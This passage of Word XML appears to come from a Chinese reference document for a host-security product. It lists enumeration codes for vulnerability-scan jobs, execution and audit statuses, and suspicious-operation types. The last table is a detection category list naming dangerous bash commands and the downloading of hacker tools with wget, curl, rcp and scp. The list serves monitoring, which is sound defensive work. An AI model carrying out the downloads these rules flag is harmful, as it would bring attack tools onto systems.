            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC83BBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA836CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>中风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59C6A83F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65D83752" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>executeSeverity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32CF3495" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52211244" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35316828" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="577" w:name="_Toc115166361"/>
      <w:bookmarkStart w:id="578" w:name="漏洞作业类型"/>
      <w:bookmarkEnd w:id="576"/>
      <w:r>
        <w:t>漏洞作业类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="577"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="71D24A1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3759641" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11121FA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F54C338" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71E22FAC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B70E285" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24AEC888" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="604FD66E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全局作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2643BD1C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D4BC10A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E39514F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67F111C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FBAAF65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="579" w:name="_Toc115166362"/>
      <w:bookmarkStart w:id="580" w:name="漏洞作业执行状态"/>
      <w:bookmarkEnd w:id="578"/>
      <w:r>
        <w:t>漏洞作业执行状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="579"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F57327A"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7E76F77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54ABDD6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="605A9D73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0304D07A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F3822CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="479BD9F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41054A6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未开始执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1834AE84" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ABE977C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CC64E9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC289FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>排队执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0AE5356D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3817BE3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01EA2486" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E87CD8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>正在执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="309F5D88" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163F5E9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="181D2924" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C012D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="204432E6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CD3F050" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19B718F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20455E6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="736156FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="581" w:name="_Toc115166363"/>
      <w:bookmarkStart w:id="582" w:name="可疑操作审核状态"/>
      <w:bookmarkEnd w:id="580"/>
      <w:r>
        <w:t>可疑操作审核状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="581"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1298"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D59B1B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852A236" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1525F951" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDA4A1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E363882" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4502C305" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="160069FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28EEDA37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="38BE24CC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3122CCD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F190017" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D253DBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>审核通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23BEA639" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7196753B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="341C5172" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D6D4361" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>审核未通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63FBA535" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="583" w:name="_Toc115166364"/>
      <w:bookmarkStart w:id="584" w:name="可疑操作类型"/>
      <w:bookmarkEnd w:id="582"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可疑操作类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="583"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2151A77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7FDCD8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC37841" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE9543E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="51521532" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54924B02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B547035" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41616AFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未命中规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F6E5956" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5503FC39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F0077A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="575B94F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>bash危险命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2ECCA8D6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77662C61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25C1740F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098E2FCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Wget下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3571FF5B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C75D9A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="502BD98C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D45AFB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>curl下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2A186C3D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715E08AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F7F7451" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="179E2C5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16855F1D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05FD1716" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596B5FF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="074C55D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A13293D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="159E9EC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
